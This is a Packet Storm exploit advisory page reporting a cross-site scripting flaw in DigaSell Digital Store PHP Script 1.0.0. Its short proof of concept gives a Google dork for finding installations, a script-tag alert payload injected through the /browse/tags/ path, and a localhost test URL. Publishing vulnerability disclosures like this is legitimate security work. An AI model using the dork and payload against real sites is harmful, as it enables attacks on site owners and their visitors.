Security
Headlines
HeadlinesLatestCVEs

Headline

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

Packet Storm
#sql#xss#csrf#vulnerability#web#ios#mac#windows#apple#google#ubuntu#linux#debian#cisco#git#java#php#perl#auth#ruby#firefox

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

File Tags

  • ActiveX (932)
  • Advisory (81,933)
  • Arbitrary (16,196)
  • BBS (2,859)
  • Bypass (1,740)
  • CGI (1,026)
  • Code Execution (7,277)
  • Conference (679)
  • Cracker (841)
  • CSRF (3,344)
  • DoS (23,416)
  • Encryption (2,370)
  • Exploit (51,861)
  • File Inclusion (4,221)
  • File Upload (973)
  • Firewall (821)
  • Info Disclosure (2,770)
  • Intrusion Detection (892)
  • Java (3,043)
  • JavaScript (858)
  • Kernel (6,671)
  • Local (14,448)
  • Magazine (586)
  • Overflow (12,691)
  • Perl (1,423)
  • PHP (5,145)
  • Proof of Concept (2,338)
  • Protocol (3,601)
  • Python (1,535)
  • Remote (30,765)
  • Root (3,581)
  • Rootkit (508)
  • Ruby (612)
  • Scanner (1,639)
  • Security Tool (7,886)
  • Shell (3,180)
  • Shellcode (1,214)
  • Sniffer (894)
  • Spoof (2,206)
  • SQL Injection (16,366)
  • TCP (2,406)
  • Trojan (687)
  • UDP (893)
  • Virus (664)
  • Vulnerability (31,770)
  • Web (9,663)
  • Whitepaper (3,749)
  • x86 (962)
  • XSS (17,932)
  • Other

File Archives

  • August 2023
  • July 2023
  • June 2023
  • May 2023
  • April 2023
  • March 2023
  • February 2023
  • January 2023
  • December 2022
  • November 2022
  • October 2022
  • September 2022
  • Older

Systems

  • AIX (428)
  • Apple (2,002)
  • BSD (373)
  • CentOS (57)
  • Cisco (1,922)
  • Debian (6,812)
  • Fedora (1,692)
  • FreeBSD (1,244)
  • Gentoo (4,322)
  • HPUX (879)
  • iOS (351)
  • iPhone (108)
  • IRIX (220)
  • Juniper (67)
  • Linux (46,428)
  • Mac OS X (686)
  • Mandriva (3,105)
  • NetBSD (256)
  • OpenBSD (485)
  • RedHat (13,711)
  • Slackware (941)
  • Solaris (1,610)
  • SUSE (1,444)
  • Ubuntu (8,808)
  • UNIX (9,289)
  • UnixWare (186)
  • Windows (6,573)
  • Other

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution